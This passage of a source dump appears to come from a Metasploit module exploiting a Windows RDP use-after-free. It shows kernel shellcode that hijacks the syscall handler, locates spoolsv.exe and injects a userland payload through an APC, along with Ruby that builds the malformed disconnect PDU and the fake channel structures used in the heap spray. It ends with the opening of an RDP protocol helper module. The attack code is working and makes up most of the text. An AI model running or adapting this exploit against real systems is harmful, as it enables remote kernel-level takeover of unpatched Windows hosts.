 442 | ; This code is effectively the same as the epilogue of the function that calls
 443 | ; the vulnerable function in the kernel, with a tweak or two.
 444 | 
 445 |     ; TODO: make the lock not suck!!
 446 |     mov     rax, qword [gs:0x188]
 447 |     add     word [rax+0x1C4], 1       ; KeGetCurrentThread()->KernelApcDisable++
 448 |     lea     r11, [rsp+0b8h]
 449 |     xor     eax, eax
 450 |     mov     rbx, [r11+30h]
 451 |     mov     rbp, [r11+40h]
 452 |     mov     rsi, [r11+48h]
 453 |     mov     rsp, r11
 454 |     pop     r15
 455 |     pop     r14
 456 |     pop     r13
 457 |     pop     r12
 458 |     pop     rdi
 459 |     ret
 460 | 
 461 | ;--------------------- END HACK crappy thread cleanup
 462 | 
 463 | ;========================================================================
 464 | ; Find memory address in HAL heap for using as data area
 465 | ; Return: rbp = data address
 466 | ;========================================================================
 467 | set_rbp_data_address_fn:
 468 |     ; On idle target without user application, syscall on hijacked processor might not be called immediately.
 469 |     ; Find some address to store the data, the data in this address MUST not be modified
 470 |     ;   when exploit is rerun before syscall is called
 471 |     ;lea rbp, [rel _set_rbp_data_address_fn_next + 0x1000]
 472 | 
 473 |     ; ------ HACK rbp wasnt valid!
 474 | 
 475 |     mov rbp, #{hal_heap_storage}    ; TODO: use some other buffer besides HAL heap??
 476 | 
 477 |     ; --------- HACK end rbp
 478 | 
 479 | _set_rbp_data_address_fn_next:
 480 |     ;shr rbp, 12
 481 |     ;shl rbp, 12
 482 |     ;sub rbp, 0x70   ; for KAPC struct too
 483 |     ret
 484 | 
 485 |     ;int 3
 486 |     ;call $+5
 487 |     ;pop r13
 488 | syscall_hook:
 489 |     swapgs
 490 |     mov qword [gs:0x10], rsp
 491 |     mov rsp, qword [gs:0x1a8]
 492 |     push 0x2b
 493 |     push qword [gs:0x10]
 494 | 
 495 |     push rax    ; want this stack space to store original syscall addr
 496 |     ; save rax first to make this function continue to real syscall
 497 |     push rax
 498 |     push rbp    ; save rbp here because rbp is special register for accessing this shellcode data
 499 |     call set_rbp_data_address_fn
 500 |     mov rax, [rbp+#{data_origin_syscall_offset}]
 501 |     add rax, 0x1f   ; adjust syscall entry, so we do not need to reverse start of syscall handler
 502 |     mov [rsp+0x10], rax
 503 | 
 504 |     ; save all volatile registers
 505 |     push rcx
 506 |     push rdx
 507 |     push r8
 508 |     push r9
 509 |     push r10
 510 |     push r11
 511 | 
 512 |     ; use lock cmpxchg for queueing APC only one at a time
 513 |     xor eax, eax
 514 |     mov dl, 1
 515 |     lock cmpxchg byte [rbp+#{data_queueing_kapc_offset}], dl
 516 |     jnz _syscall_hook_done
 517 | 
 518 |     ;======================================
 519 |     ; restore syscall
 520 |     ;======================================
 521 |     ; an error after restoring syscall should never occur
 522 |     mov ecx, 0xc0000082
 523 |     mov eax, [rbp+#{data_origin_syscall_offset}]
 524 |     mov edx, [rbp+#{data_origin_syscall_offset}+4]
 525 |     wrmsr
 526 | 
 527 |     ; allow interrupts while executing shellcode
 528 |     sti
 529 |     call r3_to_r0_start
 530 |     cli
 531 | 
 532 | _syscall_hook_done:
 533 |     pop r11
 534 |     pop r10
 535 |     pop r9
 536 |     pop r8
 537 |     pop rdx
 538 |     pop rcx
 539 |     pop rbp
 540 |     pop rax
 541 |     ret
 542 | 
 543 | r3_to_r0_start:
 544 |     ; save used non-volatile registers
 545 |     push r15
 546 |     push r14
 547 |     push rdi
 548 |     push rsi
 549 |     push rbx
 550 |     push rax    ; align stack by 0x10
 551 | 
 552 |     ;======================================
 553 |     ; find nt kernel address
 554 |     ;======================================
 555 |     mov r15, qword [rbp+#{data_origin_syscall_offset}]      ; KiSystemCall64 is an address in nt kernel
 556 |     shr r15, 0xc                ; strip to page size
 557 |     shl r15, 0xc
 558 | 
 559 | _x64_find_nt_walk_page:
 560 |     sub r15, 0x1000             ; walk along page size
 561 |     cmp word [r15], 0x5a4d      ; 'MZ' header
 562 |     jne _x64_find_nt_walk_page
 563 | 
 564 |     ; save nt address for using in KernelApcRoutine
 565 |     mov [rbp+#{data_nt_kernel_addr_offset}], r15
 566 | 
 567 |     ;======================================
 568 |     ; get current EPROCESS and ETHREAD
 569 |     ;======================================
 570 |     mov r14, qword [gs:0x188]    ; get _ETHREAD pointer from KPCR
 571 |     mov edi, #{psgetcurrentprocess_hash}
 572 |     call win_api_direct
 573 |     xchg rcx, rax       ; rcx = EPROCESS
 574 | 
 575 |     ; r15 : nt kernel address
 576 |     ; r14 : ETHREAD
 577 |     ; rcx : EPROCESS
 578 | 
 579 |     ;======================================
 580 |     ; find offset of EPROCESS.ImageFilename
 581 |     ;======================================
 582 |     mov edi, #{psgetprocessimagefilename_hash}
 583 |     call get_proc_addr
 584 |     mov eax, dword [rax+3]  ; get offset from code (offset of ImageFilename is always > 0x7f)
 585 |     mov ebx, eax        ; ebx = offset of EPROCESS.ImageFilename
 586 | 
 587 | 
 588 |     ;======================================
 589 |     ; find offset of EPROCESS.ThreadListHead
 590 |     ;======================================
 591 |     ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)
 592 |     ; if offset of ImageFilename is more than 0x400, current is (Win8+)
 593 | 
 594 |     cmp eax, 0x400      ; eax is still an offset of EPROCESS.ImageFilename
 595 |     jb _find_eprocess_threadlist_offset_win7
 596 |     add eax, 0x10
 597 | _find_eprocess_threadlist_offset_win7:
 598 |     lea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead
 599 | 
 600 |     ;======================================
 601 |     ; find offset of ETHREAD.ThreadListEntry
 602 |     ;======================================
 603 | 
 604 |     lea r8, [rcx+rdx]   ; r8 = address of EPROCESS.ThreadListHead
 605 |     mov r9, r8
 606 | 
 607 |     ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700
 608 | _find_ethread_threadlist_offset_loop:
 609 |     mov r9, qword [r9]
 610 | 
 611 |     cmp r8, r9          ; check end of list
 612 |     je _insert_queue_apc_done    ; not found !!!
 613 | 
 614 |     ; if (r9 - r14 < 0x700) found
 615 |     mov rax, r9
 616 |     sub rax, r14
 617 |     cmp rax, 0x700
 618 |     ja _find_ethread_threadlist_offset_loop
 619 |     sub r14, r9         ; r14 = -(offset of ETHREAD.ThreadListEntry)
 620 | 
 621 | 
 622 |     ;======================================
 623 |     ; find offset of EPROCESS.ActiveProcessLinks
 624 |     ;======================================
 625 |     mov edi, #{psgetprocessid_hash}
 626 |     call get_proc_addr
 627 |     mov edi, dword [rax+3]  ; get offset from code (offset of UniqueProcessId is always > 0x7f)
 628 |     add edi, 8      ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)
 629 | 
 630 | 
 631 |     ;======================================
 632 |     ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock
 633 |     ;======================================
 634 |     ; check process name
 635 | 
 636 | 
 637 |     xor eax, eax      ; HACK to exit earlier if process not found
 638 | 
 639 | _find_target_process_loop:
 640 |     lea rsi, [rcx+rbx]
 641 | 
 642 |     push rax
 643 |     call calc_hash
 644 |     cmp eax, #{spoolsv_exe_hash}  ; "spoolsv.exe"
 645 |     pop rax
 646 |     jz found_target_process
 647 | 
 648 | ;---------- HACK PROCESS NOT FOUND start -----------
 649 |     inc rax
 650 |     cmp rax, 0x300      ; HACK not found!
 651 |     jne _next_find_target_process
 652 |     xor ecx, ecx
 653 |     ; clear queueing kapc flag, allow other hijacked system call to run shellcode
 654 |     mov byte [rbp+#{data_queueing_kapc_offset}], cl
 655 | 
 656 |     jmp _r3_to_r0_done
 657 | 
 658 | ;---------- HACK PROCESS NOT FOUND end -----------
 659 | 
 660 | _next_find_target_process:
 661 |     ; next process
 662 |     mov rcx, [rcx+rdi]
 663 |     sub rcx, rdi
 664 |     jmp _find_target_process_loop
 665 | 
 666 | 
 667 | found_target_process:
 668 |     ; The allocation for userland payload will be in KernelApcRoutine.
 669 |     ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()
 670 | 
 671 |     ;======================================
 672 |     ; save process PEB for finding CreateThread address in kernel KAPC routine
 673 |     ;======================================
 674 |     mov edi, #{psgetprocesspeb_hash}
 675 |     ; rcx is EPROCESS. no need to set it.
 676 |     call win_api_direct
 677 |     mov [rbp+#{data_peb_addr_offset}], rax
 678 | 
 679 | 
 680 |     ;======================================
 681 |     ; iterate ThreadList until KeInsertQueueApc() success
 682 |     ;======================================
 683 |     ; r15 = nt
 684 |     ; r14 = -(offset of ETHREAD.ThreadListEntry)
 685 |     ; rcx = EPROCESS
 686 |     ; edx = offset of EPROCESS.ThreadListHead
 687 | 
 688 | 
 689 |     lea rsi, [rcx + rdx]    ; rsi = ThreadListHead address
 690 |     mov rbx, rsi    ; use rbx for iterating thread
 691 | 
 692 |     ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.
 693 |     ; Moreover, alertable thread need to be waiting state which is more difficult to check.
 694 |     ; try queueing APC then check KAPC member is more reliable.
 695 | 
 696 | _insert_queue_apc_loop:
 697 |     ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front
 698 |     mov rbx, [rbx+8]
 699 | 
 700 |     cmp rsi, rbx
 701 |     je _insert_queue_apc_loop   ; skip list head
 702 | 
 703 |     ; find start of ETHREAD address
 704 |     ; set it to rdx to be used for KeInitializeApc() argument too
 705 |     lea rdx, [rbx + r14]    ; ETHREAD
 706 | 
 707 |     ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.
 708 |     ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.
 709 |     ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.
 710 |     ; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.
 711 |     ; Teb member is next to Queue member.
 712 |     mov edi, #{psgetthreadteb_hash}
 713 |     call get_proc_addr
 714 |     mov eax, dword [rax+3]      ; get offset from code (offset of Teb is always > 0x7f)
 715 |     cmp qword [rdx+rax-8], 0    ; KTHREAD.Queue MUST not be NULL
 716 |     je _insert_queue_apc_loop
 717 | 
 718 |     ; KeInitializeApc(PKAPC,
 719 |     ;                 PKTHREAD,
 720 |     ;                 KAPC_ENVIRONMENT = OriginalApcEnvironment (0),
 721 |     ;                 PKKERNEL_ROUTINE = kernel_apc_routine,
 722 |     ;                 PKRUNDOWN_ROUTINE = NULL,
 723 |     ;                 PKNORMAL_ROUTINE = userland_shellcode,
 724 |     ;                 KPROCESSOR_MODE = UserMode (1),
 725 |     ;                 PVOID Context);
 726 |     lea rcx, [rbp+#{data_kapc_offset}]     ; PAKC
 727 |     xor r8, r8      ; OriginalApcEnvironment
 728 |     lea r9, [rel kernel_kapc_routine]    ; KernelApcRoutine
 729 |     push rbp    ; context
 730 |     push 1      ; UserMode
 731 |     push rbp    ; userland shellcode (MUST NOT be NULL)
 732 |     push r8     ; NULL
 733 |     sub rsp, 0x20   ; shadow stack
 734 |     mov edi, #{keinitializeapc_hash}
 735 |     call win_api_direct
 736 |     ; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later
 737 | 
 738 |     ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);
 739 |     ;   SystemArgument1 is second argument in usermode code (rdx)
 740 |     ;   SystemArgument2 is third argument in usermode code (r8)
 741 |     lea rcx, [rbp+#{data_kapc_offset}]
 742 |     ;xor edx, edx   ; no need to set it here
 743 |     ;xor r8, r8     ; no need to set it here
 744 |     xor r9, r9
 745 |     mov edi, #{keinsertqueueapc_hash}
 746 |     call win_api_direct
 747 |     add rsp, 0x40
 748 |     ; if insertion failed, try next thread
 749 |     test eax, eax
 750 |     jz _insert_queue_apc_loop
 751 | 
 752 |     mov rax, [rbp+#{data_kapc_offset}+0x10]     ; get KAPC.ApcListEntry
 753 |     ; EPROCESS pointer 8 bytes
 754 |     ; InProgressFlags 1 byte
 755 |     ; KernelApcPending 1 byte
 756 |     ; if success, UserApcPending MUST be 1
 757 |     cmp byte [rax+0x1a], 1
 758 |     je _insert_queue_apc_done
 759 | 
 760 |     ; manual remove list without lock
 761 |     mov [rax], rax
 762 |     mov [rax+8], rax
 763 |     jmp _insert_queue_apc_loop
 764 | 
 765 | _insert_queue_apc_done:
 766 |     ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.
 767 | 
 768 | _r3_to_r0_done:
 769 |     pop rax
 770 |     pop rbx
 771 |     pop rsi
 772 |     pop rdi
 773 |     pop r14
 774 |     pop r15
 775 |     ret
 776 | 
 777 | ;========================================================================
 778 | ; Call function in specific module
 779 | ;
 780 | ; All function arguments are passed as calling normal function with extra register arguments
 781 | ; Extra Arguments: r15 = module pointer
 782 | ;                  edi = hash of target function name
 783 | ;========================================================================
 784 | win_api_direct:
 785 |     call get_proc_addr
 786 |     jmp rax
 787 | 
 788 | 
 789 | ;========================================================================
 790 | ; Get function address in specific module
 791 | ;
 792 | ; Arguments: r15 = module pointer
 793 | ;            edi = hash of target function name
 794 | ; Return: eax = offset
 795 | ;========================================================================
 796 | get_proc_addr:
 797 |     ; Save registers
 798 |     push rbx
 799 |     push rcx
 800 |     push rsi                ; for using calc_hash
 801 | 
 802 |     ; use rax to find EAT
 803 |     mov eax, dword [r15+60]  ; Get PE header e_lfanew
 804 |     mov eax, dword [r15+rax+136] ; Get export tables RVA
 805 | 
 806 |     add rax, r15
 807 |     push rax                 ; save EAT
 808 | 
 809 |     mov ecx, dword [rax+24]  ; NumberOfFunctions
 810 |     mov ebx, dword [rax+32]  ; FunctionNames
 811 |     add rbx, r15
 812 | 
 813 | _get_proc_addr_get_next_func:
 814 |     ; When we reach the start of the EAT (we search backwards), we hang or crash
 815 |     dec ecx                     ; decrement NumberOfFunctions
 816 |     mov esi, dword [rbx+rcx*4]  ; Get rva of next module name
 817 |     add rsi, r15                ; Add the modules base address
 818 | 
 819 |     call calc_hash
 820 | 
 821 |     cmp eax, edi                        ; Compare the hashes
 822 |     jnz _get_proc_addr_get_next_func    ; try the next function
 823 | 
 824 | _get_proc_addr_finish:
 825 |     pop rax                     ; restore EAT
 826 |     mov ebx, dword [rax+36]
 827 |     add rbx, r15                ; ordinate table virtual address
 828 |     mov cx, word [rbx+rcx*2]    ; desired functions ordinal
 829 |     mov ebx, dword [rax+28]     ; Get the function addresses table rva
 830 |     add rbx, r15                ; Add the modules base address
 831 |     mov eax, dword [rbx+rcx*4]  ; Get the desired functions RVA
 832 |     add rax, r15                ; Add the modules base address to get the functions actual VA
 833 | 
 834 |     pop rsi
 835 |     pop rcx
 836 |     pop rbx
 837 |     ret
 838 | 
 839 | ;========================================================================
 840 | ; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.
 841 | ;
 842 | ; Argument: rsi = string to hash
 843 | ; Clobber: rsi
 844 | ; Return: eax = hash
 845 | ;========================================================================
 846 | calc_hash:
 847 |     push rdx
 848 |     xor eax, eax
 849 |     cdq
 850 | _calc_hash_loop:
 851 |     lodsb                   ; Read in the next byte of the ASCII string
 852 |     ror edx, 13             ; Rotate right our hash value
 853 |     add edx, eax            ; Add the next byte of the string
 854 |     test eax, eax           ; Stop when found NULL
 855 |     jne _calc_hash_loop
 856 |     xchg edx, eax
 857 |     pop rdx
 858 |     ret
 859 | 
 860 | 
 861 | ; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.
 862 | ; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().
 863 | ; Moreover, there is no lock when calling KernelApcRoutine.
 864 | ; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.
 865 | ;
 866 | ; VOID KernelApcRoutine(
 867 | ;           IN PKAPC Apc,
 868 | ;           IN PKNORMAL_ROUTINE *NormalRoutine,
 869 | ;           IN PVOID *NormalContext,
 870 | ;           IN PVOID *SystemArgument1,
 871 | ;           IN PVOID *SystemArgument2)
 872 | kernel_kapc_routine:
 873 |     push rbp
 874 |     push rbx
 875 |     push rdi
 876 |     push rsi
 877 |     push r15
 878 | 
 879 |     mov rbp, [r8]       ; *NormalContext is our data area pointer
 880 | 
 881 |     mov r15, [rbp+#{data_nt_kernel_addr_offset}]
 882 |     push rdx
 883 |     pop rsi     ; mov rsi, rdx
 884 |     mov rbx, r9
 885 | 
 886 |     ;======================================
 887 |     ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)
 888 |     ;======================================
 889 |     xor eax, eax
 890 |     mov cr8, rax    ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)
 891 |     ; rdx is already address of baseAddr
 892 |     mov [rdx], rax      ; baseAddr = 0
 893 |     mov ecx, eax
 894 |     not rcx             ; ProcessHandle = -1
 895 |     mov r8, rax         ; ZeroBits
 896 |     mov al, 0x40    ; eax = 0x40
 897 |     push rax            ; PAGE_EXECUTE_READWRITE = 0x40
 898 |     shl eax, 6      ; eax = 0x40 << 6 = 0x1000
 899 |     push rax            ; MEM_COMMIT = 0x1000
 900 |     ; reuse r9 for address of RegionSize
 901 |     mov [r9], rax       ; RegionSize = 0x1000
 902 |     sub rsp, 0x20   ; shadow stack
 903 |     mov edi, #{zwallocatevirtualmemory_hash}
 904 |     call win_api_direct
 905 |     add rsp, 0x30
 906 | 
 907 |     ; check error
 908 |     test eax, eax
 909 |     jnz _kernel_kapc_routine_exit
 910 | 
 911 |     ;======================================
 912 |     ; copy userland payload
 913 |     ;======================================
 914 |     mov rdi, [rsi]
 915 | 
 916 | ;--------------------------- HACK IN EGG USER ---------
 917 | 
 918 |     push rdi
 919 | 
 920 |     lea rsi, [rel shellcode_start]
 921 |     mov rdi, 0x#{USERMODE_EGG.to_s(16)}
 922 | 
 923 |   _find_user_egg_loop:
 924 |       sub rsi, 0x#{CHUNK_SIZE.to_s(16)}
 925 |       mov rax, [rsi - 8]
 926 |       cmp rax, rdi
 927 |       jnz _find_user_egg_loop
 928 | 
 929 |   _inner_find_user_egg_loop:
 930 |       inc rsi
 931 |       mov rax, [rsi - 8]
 932 |       cmp rax, rdi
 933 |       jnz _inner_find_user_egg_loop
 934 | 
 935 |     pop rdi
 936 | ;--------------------------- END HACK EGG USER ------------
 937 | 
 938 |     mov ecx, 0x380  ; fix payload size to 0x380 bytes
 939 | 
 940 |     rep movsb
 941 | 
 942 |     ;======================================
 943 |     ; find CreateThread address (in kernel32.dll)
 944 |     ;======================================
 945 |     mov rax, [rbp+#{data_peb_addr_offset}]
 946 |     mov rax, [rax + 0x18]       ; PEB->Ldr
 947 |     mov rax, [rax + 0x20]       ; InMemoryOrder list
 948 | 
 949 |     ;lea rsi, [rcx + rdx]    ; rsi = ThreadListHead address
 950 |     ;mov rbx, rsi    ; use rbx for iterating thread
 951 | _find_kernel32_dll_loop:
 952 |     mov rax, [rax]       ; first one always be executable
 953 |     ; offset 0x38 (WORD)  => must be 0x40 (full name len c:\windows\system32\kernel32.dll)
 954 |     ; offset 0x48 (WORD)  => must be 0x18 (name len kernel32.dll)
 955 |     ; offset 0x50  => is name
 956 |     ; offset 0x20  => is dllbase
 957 |     ;cmp word [rax+0x38], 0x40
 958 |     ;jne _find_kernel32_dll_loop
 959 |     cmp word [rax+0x48], 0x18
 960 |     jne _find_kernel32_dll_loop
 961 | 
 962 |     mov rdx, [rax+0x50]
 963 |     ; check only "32" because name might be lowercase or uppercase
 964 |     cmp dword [rdx+0xc], 0x00320033   ; 3\x002\x00
 965 |     jnz _find_kernel32_dll_loop
 966 | 
 967 |     ;int3
 968 |     mov r15, [rax+0x20]
 969 |     mov edi, #{createthread_hash}
 970 |     call get_proc_addr
 971 | 
 972 |     ; save CreateThread address to SystemArgument1
 973 |     mov [rbx], rax
 974 | 
 975 | _kernel_kapc_routine_exit:
 976 |     xor ecx, ecx
 977 |     ; clear queueing kapc flag, allow other hijacked system call to run shellcode
 978 |     mov byte [rbp+#{data_queueing_kapc_offset}], cl
 979 |     ; restore IRQL to APC_LEVEL
 980 |     mov cl, 1
 981 |     mov cr8, rcx
 982 | 
 983 |     pop r15
 984 |     pop rsi
 985 |     pop rdi
 986 |     pop rbx
 987 |     pop rbp
 988 |     ret
 989 | 
 990 | 
 991 | userland_start:
 992 | userland_start_thread:
 993 |     ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)
 994 |     xchg rdx, rax   ; rdx is CreateThread address passed from kernel
 995 |     xor ecx, ecx    ; lpThreadAttributes = NULL
 996 |     push rcx        ; lpThreadId = NULL
 997 |     push rcx        ; dwCreationFlags = 0
 998 |     mov r9, rcx     ; lpParameter = NULL
 999 |     lea r8, [rel userland_payload]  ; lpStartAddr
1000 |     mov edx, ecx    ; dwStackSize = 0
1001 |     sub rsp, 0x20
1002 |     call rax
1003 |     add rsp, 0x30
1004 |     ret
1005 | 
1006 | userland_payload:
1007 |     ^
1008 | 
1009 |     [
1010 |       KERNELMODE_EGG,
1011 |       assemble_with_fixups(asm)
1012 |     ].pack('<Qa*')
1013 |   end
1014 | 
1015 |   def create_free_trigger(chan_user_id, chan_id)
1016 |     # malformed Disconnect Provider Indication PDU (opcode: 0x2, total_size != 0x20)
1017 |     vprint_status("Creating free trigger for user #{chan_user_id} on channel #{chan_id}")
1018 |     # The extra bytes on the end of the body is what causes the bad things to happen
1019 |     body = "\x00\x00\x00\x00\x00\x00\x00\x00\x02" + "\x00" * 22
1020 |     rdp_create_channel_msg(chan_user_id, chan_id, body, 3, 0xFFFFFFF)
1021 |   end
1022 | 
1023 |   def create_exploit_channel_buffer(target_addr)
1024 |     overspray_addr = target_addr + 0x2000
1025 |     shellcode_vtbl = target_addr + HEADER_SIZE
1026 |     magic_value1 = overspray_addr + 0x810
1027 |     magic_value2 = overspray_addr + 0x48
1028 |     magic_value3 = overspray_addr + CHUNK_SIZE + HEADER_SIZE
1029 | 
1030 |     # first 0x38 bytes are used by DATA PDU packet
1031 |     # exploit channel starts at +0x38, which is +0x20 of an _ERESOURCE
1032 |     # http://www.tssc.de/winint/Win10_17134_ntoskrnl/_ERESOURCE.htm
1033 |     [
1034 |       [
1035 |         # SystemResourceList (2 pointers, each 8 bytes)
1036 |         # Pointer to OWNER_ENTRY (8 bytes)
1037 |         # ActiveCount (SHORT, 2 bytes)
1038 |         # Flag (WORD, 2 bytes)
1039 |         # Padding (BYTE[4], 4 bytes) x64 only
1040 |         0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)
1041 |         0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)
1042 |         magic_value2, # OwnerThread (ULONG, 8 bytes)
1043 |         magic_value2, # TableSize (ULONG, 8 bytes)
1044 |         0x0, # ActiveEntries (DWORD, 4 bytes)
1045 |         0x0, # ContenttionCount (DWORD, 4 bytes)
1046 |         0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)
1047 |         0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)
1048 |         0x0, # Reserved2 (PVOID, 8 bytes) x64 only
1049 |         magic_value2, # Address (PVOID, 8 bytes)
1050 |         0x0, # SpinLock (UINT_PTR, 8 bytes)
1051 |       ].pack('<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),
1052 |       [
1053 |         magic_value2, # SystemResourceList (2 pointers, each 8 bytes)
1054 |         magic_value2, # --------------------
1055 |         0x0, # Pointer to OWNER_ENTRY (8 bytes)
1056 |         0x0, # ActiveCount (SHORT, 2 bytes)
1057 |         0x0, # Flag (WORD, 2 bytes)
1058 |         0x0, # Padding (BYTE[4], 4 bytes) x64 only
1059 |         0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)
1060 |         0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)
1061 |         magic_value2, # OwnerThread (ULONG, 8 bytes)
1062 |         magic_value2, # TableSize (ULONG, 8 bytes)
1063 |         0x0, # ActiveEntries (DWORD, 4 bytes)
1064 |         0x0, # ContenttionCount (DWORD, 4 bytes)
1065 |         0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)
1066 |         0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)
1067 |         0x0, # Reserved2 (PVOID, 8 bytes) x64 only
1068 |         magic_value2, # Address (PVOID, 8 bytes)
1069 |         0x0, # SpinLock (UINT_PTR, 8 bytes)
1070 |       ].pack('<Q<Q<Q<S<S<L<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),
1071 |       [
1072 |         0x1F, # ClassOffset (DWORD, 4 bytes)
1073 |         0x0, # bindStatus (DWORD, 4 bytes)
1074 |         0x72, # lockCount1 (QWORD, 8 bytes)
1075 |         magic_value3, # connection (QWORD, 8 bytes)
1076 |         shellcode_vtbl, # shellcode vtbl ? (QWORD, 8 bytes)
1077 |         0x5, # channelClass (DWORD, 4 bytes)
1078 |         "MS_T120\x00".encode('ASCII'), # channelName (BYTE[8], 8 bytes)
1079 |         0x1F, # channelIndex (DWORD, 4 bytes)
1080 |         magic_value1, # channels (QWORD, 8 bytes)
1081 |         magic_value1, # connChannelsAddr (POINTER, 8 bytes)
1082 |         magic_value1, # list1 (QWORD, 8 bytes)
1083 |         magic_value1, # list1 (QWORD, 8 bytes)
1084 |         magic_value1, # list2 (QWORD, 8 bytes)
1085 |         magic_value1, # list2 (QWORD, 8 bytes)
1086 |         0x65756c62, # inputBufferLen (DWORD, 4 bytes)
1087 |         0x7065656b, # inputBufferLen (DWORD, 4 bytes)
1088 |         magic_value1, # connResrouce (QWORD, 8 bytes)
1089 |         0x65756c62, # lockCount158 (DWORD, 4 bytes)
1090 |         0x7065656b, # dword15C (DWORD, 4 bytes)
1091 |       ].pack('<L<L<Q<Q<Q<La*<L<Q<Q<Q<Q<Q<Q<L<L<Q<L<L')
1092 |     ].join('')
1093 |   end
1094 | 
1095 | end
1096 | 


--------------------------------------------------------------------------------
/rdp.rb:
--------------------------------------------------------------------------------
   1 | # -*- coding: binary -*-
   2 | 
   3 | module Msf
   4 | 
   5 | ###
   6 | #
   7 | # This module exposes methods for interacting with a remote RDP service
   8 | #
   9 | ###
  10 | module Exploit::Remote::RDP
  11 |   require 'rc4'
  12 |   include Msf::Exploit::Remote::Tcp
  13 | 
  14 |   #
  15 |   # Creates an instance of a RDP exploit module.
  16 |   #
  17 |   def initialize(info = {})
  18 |     super
  19 |     register_options(
  20 |       [
  21 |         OptString.new('RDP_USER', [ false, 'The username to report during connect, UNSET = random']),
  22 |         OptString.new('RDP_CLIENT_NAME', [ false, 'The client computer name to report during connect, UNSET = random', 'rdesktop']),
  23 |         OptString.new('RDP_DOMAIN', [ false, 'The client domain name to report during connect']),
  24 |         OptAddress.new('RDP_CLIENT_IP', [ true, 'The client IPv4 address to report during connect', '192.168.0.100']),
  25 |         Opt::RPORT(3389)
  26 |       ], Msf::Exploit::Remote::RDP)
  27 |   end
  28 | 
  29 | 
  30 |   # used to abruptly abort scanner for a given host
  31 |   class RdpCommunicationError < StandardError
  32 |   end
  33 | 
  34 |   #
  35 |   # Constants
  36 |   #
  37 |   class RDPConstants
  38 |     SSL_REQUIRED_BY_SERVER = 1
  39 |     SSL_NOT_ALLOWED_BY_SERVER = 2
  40 |     SSL_CERT_NOT_ON_SERVER = 3
  41 |     INCONSISTENT_FLAGS = 4
  42 |     HYBRID_REQUIRED_BY_SERVER = 5
  43 |     SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER = 6
  44 | 
  45 |     PROTOCOL_RDP = 0
  46 |     PROTOCOL_SSL = 1
  47 |     PROTOCOL_HYBRID = 2
  48 |     PROTOCOL_RDSTLS = 4
  49 |     PROTOCOL_HYBRID_EX = 8
  50 | 
  51 |     RDP_NEG_PROTOCOL = {
  52 |       0 => "PROTOCOL_RDP",
  53 |       1 => "PROTOCOL_SSL",
  54 |       2 => "PROTOCOL_HYBRID",
  55 |       4 => "PROTOCOL_RDSTLS",
  56 |       8 => "PROTOCOL_HYBRID_EX"
  57 |     }
  58 | 
  59 |     RDP_NEG_FAILURE = {
  60 |       1 => "SSL_REQUIRED_BY_SERVER",
  61 |       2 => "SSL_NOT_ALLOWED_BY_SERVER",
  62 |       3 => "SSL_CERT_NOT_ON_SERVER",
  63 |       4 => "INCONSISTENT_FLAGS",
  64 |       5 => "HYBRID_REQUIRED_BY_SERVER",
  65 |       6 => "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER"
  66 |     }
  67 | 
  68 |     REDIRECTION_SUPPORTED = 0x1
  69 |     REDIRECTION_VERSION3  = 0x2 << 2
  70 |     REDIRECTION_VERSION4  = 0x3 << 2
  71 |     REDIRECTION_VERSION5  = 0x4 << 2
  72 | 
  73 |     ENCRYPTION_40BIT  = 0x01
  74 |     ENCRYPTION_128BIT = 0x02
  75 |     ENCRYPTION_56BIT  = 0x08
  76 |     ENCRYPTION_FIPS   = 0x10
  77 | 
  78 |     CHAN_INITIALIZED               = 0x80000000
  79 |     CHAN_ENCRYPT_RDP               = 0x40000000
  80 |     CHAN_ENCRYPT_SC                = 0x20000000
  81 |     CHAN_ENCRYPT_CS                = 0x10000000
  82 |     CHAN_PRI_HIGH                  = 0x08000000
  83 |     CHAN_PRI_MED                   = 0x04000000
  84 |     CHAN_PRI_LOW                   = 0x02000000
  85 |     CHAN_COMPRESS_RDP              = 0x00800000
  86 |     CHAN_COMPRESS                  = 0x00400000
  87 |     CHAN_SHOW_PROTOCOL             = 0x00200000
  88 |     CHAN_REMOTE_CONTROL_PERSISTENT = 0x00100000
  89 | 
  90 |     CHAN_FLAG_FIRST         = 0x01
  91 |     CHAN_FLAG_LAST          = 0x02
  92 |     CHAN_FLAG_SHOW_PROTOCOL = 0x10
  93 | 
  94 |     RDPDR_CTYP_CORE = 0x4472
  95 | 
  96 |     PAKID_CORE_SERVER_ANNOUNCE     = 0x496e
